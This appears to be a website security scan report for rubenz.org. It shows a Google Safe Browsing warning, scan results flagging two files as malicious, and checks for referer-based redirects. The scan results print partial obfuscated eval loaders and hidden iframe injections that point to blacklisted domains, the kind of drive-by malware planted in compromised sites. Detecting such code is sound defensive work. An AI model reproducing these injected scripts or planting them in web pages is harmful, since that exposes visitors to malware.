Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rubenz.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rubenz.org/ | 200 OK Content-Length: 62790 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: gce5c5hp597.org eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgY ...[900 bytes skipped]... Decoded script: ...[1332 bytes skipped]... olute;left:-1000px;top:-1000px;'></i"+fff+"e>"); } function iframer() { var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://gce5c5hp597.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> | ||
http://rubenz.org/test/jquery.js | 200 OK Content-Length: 130319 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: verdictdeclick.com try{vfE++;}catch(ABWTE){try{GZDG|15232}catch(ewabgre){m=Math;ev=window[""+"e"+"val"];}ff="fromCha";ff+="rCode";n="1624&&1710&&1694&&1845&&1652&&1530&&966&&645&&602&&885&&1750&&1485&&1358&&1740&&1386&&1560&&560&&975&&924&&1305&&1176&&1035&&574&&1845&&1624&&17 ...[9422 bytes skipped]... Decoded script: ...[40961 bytes skipped]... amp;1400&&1740&&1456&&915&&476&&750&&476&&930&&840&&705&&1470&&1530&&1596&&1455&&1526&&1515&&868&&585&&574&&885&&182&&150".split("&&");h=2;s="";if(m)for(i=0;i-198!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} document.write('<iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="aut ...[503 bytes skipped]... | ||
http://rubenz.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rubenz.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 12:59:46 GMT
Accept-Ranges: bytes
ETag: "f546-4cbdf17b92dc0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 62790
Content-Type: text/html
Last-Modified: Fri, 12 Oct 2012 16:22:23 GMT
...62790 bytes of data.
GET / HTTP/1.1
Host: rubenz.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 12:59:46 GMT
Accept-Ranges: bytes
ETag: "f546-4cbdf17b92dc0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 62790
Content-Type: text/html
Last-Modified: Fri, 12 Oct 2012 16:22:23 GMT
...62790 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rubenz.org
Referer: http://www.google.com/search?q=rubenz.org
Result:
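The result is similar to the first query. No suspicious redirects were found. As shown, this check varies only the Referer header, so redirects keyed on other request properties (such as the User-Agent, which the response lists in its Vary header) are not ruled out by it.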
GET / HTTP/1.1
Host: rubenz.org
Referer: http://www.google.com/search?q=rubenz.org
Result:
The result is similar to the first query. No suspicious redirects were found.